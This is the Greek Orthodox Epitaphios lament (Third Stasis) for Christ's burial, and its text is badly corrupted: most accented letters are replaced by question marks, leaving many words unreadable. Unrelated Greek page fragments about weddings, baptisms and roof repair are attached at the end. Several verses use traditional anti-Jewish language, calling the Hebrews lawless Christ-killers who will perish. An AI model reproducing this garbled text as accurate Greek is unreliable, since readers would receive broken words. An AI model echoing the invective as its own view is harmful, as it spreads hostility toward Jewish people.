ΣΤΑΣIΣ ΤΡΙΤΗ

Α? γενεα? π?σαι, ?μνον τ? Ταφ? σου, προσφ?ρουσι Χριστ? μου.

Καθελ?ν το? ξ?λου, ? ?ριμαθα?ας, ?ν ταφ? σε κηδε?ει.

Μυροφ?ροι ?λθον, μ?ρα σοι Χριστ? μου, κομ?ζουσαι προφρ?νως.

Δε?ρο π?σα κτ?σις, ?μνους ?ξοδ?ους, προσο?σωμεν τ? Κτ?στ?.

?ς νεκρ?ν τ?ν ζ?ντα, σ?ν Μυροφ?ροις π?ντες, μυρ?σωμεν ?μφρ?νως.

?ωσ?φ τρισμ?καρ, κ?δευσον τ? σ?μα, Χριστο? το? ζωοδ?του.

Ο?ς ?θρεψε τ? μ?ννα, ?κ?νησαν τ?ν πτ?ρναν, κατ? το? Ε?εργ?του.

Ο?ς ?θρεψε τ? μ?ννα, φ?ρουσι τ? Σωτ?ρι, χολ?ν ?μα κα? ?ξος.

? τ?ς παραφροσ?νης, κα? τ?ς Χριστοκτον?ας, τ?ς τ?ν προφητοκτ?νων!

?ς ?φρων ?πηρ?της, προδ?δωκεν ? μ?στης, τ?ν ?βυσσον σοφ?ας.

Τ?ν ??στην ? πωλ?σας, α?χμ?λωτος κατ?στη, ? δ?λιος ?ο?δας.

Κατ? τ?ν Σολομ?ντα, β?θρος βαθ?ς τ? στ?μα, ?βρα?ων παραν?μων.

?βρα?ων παραν?μων, ?ν σκολια?ς πορε?αις, τρ?βολοι κα? παγ?δες.

?ωσ?φ κηδε?ει, σ?ν τ? Νικοδ?μω, νεκροπρεπ?ς τ?ν Κτ?στην.

Ζωοδ?τα Σ?τερ, δ?ξα σου τ? κρ?τει, τ?ν ?δην καθελ?ντι.

?πτιον ?ρ?σα, ? Π?ναγν?ς σε Λ?γε, μητροπρεπ?ς ?θρ?νει.

? γλυκ? μου ?αρ, γλυκ?τατ?ν μου Τ?κνον, πο? ?δυ σου τ? κ?λλος;

Θρ?νον συνεκ?νει, ? π?ναγν?ς σου Μ?τηρ, σο? Λ?γε νεκρωθ?ντος.

Γ?ναια σ?ν μ?ροις, ?κουσι μυρ?σαι, Χριστ?ν τ? θε?ον μ?ρον.

Θ?νατον θαν?τ?, σ? θανατο?ς Θε? μου, θεί? σου δυναστε??.

Πεπλ?νηται ? πλ?νος, ? πλανηθε?ς λυτρο?ται, σοφ?? σ? Θε? μου.

Πρ?ς τ?ν πυθμ?να ?δου, κατ?χθη ? προδ?της, διαφθορ?ς ε?ς φρ?αρ.

Τρ?βολοι κα? παγ?δες, ?δο? το? τρισαθλ?ου, παρ?φρονος ?ο?δα.

Συναπολο?νται π?ντες, ο? σταυρωτα? σου Λ?γε, Υ?? Θεο? παντ?ναξ.

Διαφθορ?ς ε?ς φρ?αρ, συναπολο?νται π?ντες, ο? ?νδρες τ?ν α?μ?των.

Υ?? Θεο? παντ?ναξ, Θε? μου πλαστουργ? μου, π?ς π?θος κατεδ?ξω;

? δ?μαλις τ?ν μ?σχον, ?ν Ξ?λ? κρεμασθ?ντα, ?λ?λαζεν ?ρ?σα.

Σ?μα τ? ζωηφ?ρον, ? ?ωσ?φ κηδε?ει, μετ? το? Νικοδ?μου.

?ν?κραζεν ? Κ?ρη, θερμ?ς δακρυ??οο?σα, τ? σπλ?γχνα κεντουμ?νη.

? φ?ς τ?ν ?φθαλμ?ν μου, γλυκ?τατ?ν μου Τ?κνον, π?ς τ?φ? ν?ν καλ?πτ?;

Τ?ν ?δ?μ κα? Ε?αν, ?λευθερ?σαι, Μ?τερ, μ? θρ?νει, τα?τα π?σχω.

Δοξ?ζω σου Υ?? μου, τ?ν ?κραν ε?σπλαγχν?αν, ?ς χ?ριν τα?τα π?σχεις.

?ξος ?ποτ?σθης, κα? χολ?ν ο?κτίρμων, τ?ν π?λαι λ?ων γε?σιν.

?κρ?ω προσεπ?γης, ? π?λαι τ?ν λα?ν σου, στ?λ? νεφ?λης σκ?πων.

Α? Μυροφ?ροι Σ?τερ, τ? τ?φ? προσελθο?σαι, προσ?φερ?ν σοι μ?ρα.

?ν?στηθι, ο?κτίρμον, ?μ?ς ?κ τ?ν βαρ?θρων, ?ξανιστ?ν το? ?δου.

?ν?στα Ζωοδ?τα, ? σε τεκο?σα Μ?τηρ, δακρυ??οο?σα λ?γει.

Σπε?σον ?ξαναστ?ναι, τ?ν λ?πην λ?ων Λ?γε, τ?ς Σε ?γν?ς Τεκο?σης.

Ο?ρ?νιαι Δυν?μεις, ?ξ?στησαν τ? φ?β?, νεκρ?ν σε καθορ?σαι.

Το?ς ποθ? τε κα? φ?β?, τ? π?θη σου τιμ?σι, πταισμ?των δ?δου λ?σιν.

? φρικτ?ν κα? ξ?νον, θ?αμα Θεο? Λ?γε! π?ς γ? σε συγκαλ?πτει;

Φ?ρων π?λαι φε?γει, Σ?τερ ?ωσ?φ σε, κα? ν?ν σε ?λλος θ?πτει.

Κλα?ει κα? θρηνε? σε, ? π?ναγν?ς σου Μ?τηρ, Σωτ?ρ μου νεκρωθ?ντα.

Φρ?ττουσιν ο? ν?ες, τ?ν ξ?νην κα? φρικτ?ν σου, Ταφ?ν το? π?ντων Κτ?στου.

???αναν τ?ν τ?φον, α? Μυροφ?ροι μ?ρα, λ?αν πρω? ?λθο?σαι.

?ρ?ματα κα? μ?ρα, μαθ?τριαι γυνα?κες, προσφ?ρουσι τ? Τ?φ?.

Τ? «χα?ρετε» δ' ?κε?ναι, ?κο?ουσιν ε?θ?ως, ε?ς ?μοιβ?ν τ?ν δ?ρων.

Τ? δ?κρυα ?ς μ?ρα, τ? σ? Ταφ? προσφ?ρειν, ?ξ?ως?ν με Σ?τερ.

Ε?ρ?νην ?κκλησ?α, λα? σου σωτηρ?αν, δ?ρησαι σ? ?γ?ρσει.

Δ?ξα...

? Τρι?ς Θε? μου, Πατ?ρ Υ??ς κα? Πνε?μα, ?λ?ησον τ?ν Κ?σμον.

Κα? ν?ν...

?δε?ν τ?ν το? Υ?ο? σου, ?ν?στασιν Παρθ?νε, ?ξ?ωσον σο?ς δο?λους.

Α? γενεα? π?σαι, ?μνον τ? Ταφ? σου, προσφ?ρουσι Χριστ? μου.

 

 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;